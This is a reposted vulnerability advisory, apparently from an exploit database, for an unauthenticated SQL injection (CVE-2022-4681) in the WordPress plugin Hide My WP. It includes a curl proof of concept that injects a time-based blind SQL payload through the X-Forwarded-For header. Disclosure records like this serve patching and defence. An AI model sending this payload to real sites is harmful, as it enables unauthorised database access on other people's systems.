WordPress Hide My WP SQL Injection
2024-3-12 05:31:28 Author: cxsecurity.com(查看原文) 阅读量:10 收藏

# Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi # Publication Date: 2023-01-11 # Original Researcher: Xenofon Vassilakopoulos # Exploit Author: Xenofon Vassilakopoulos # Submitter: Xenofon Vassilakopoulos # Vendor Homepage: https://wpwave.com/ # Version: Hide My WP v6.2.8 and prior # Tested on: Hide My WP v6.2.7 # Impact: Database Access # CVE: CVE-2022-4681 # CWE: CWE-89 # CVSS Score: 8.6 (high) ## Description The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection. ## Proof of Concept curl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2024030017
如有侵权请联系:admin#unsafe.sh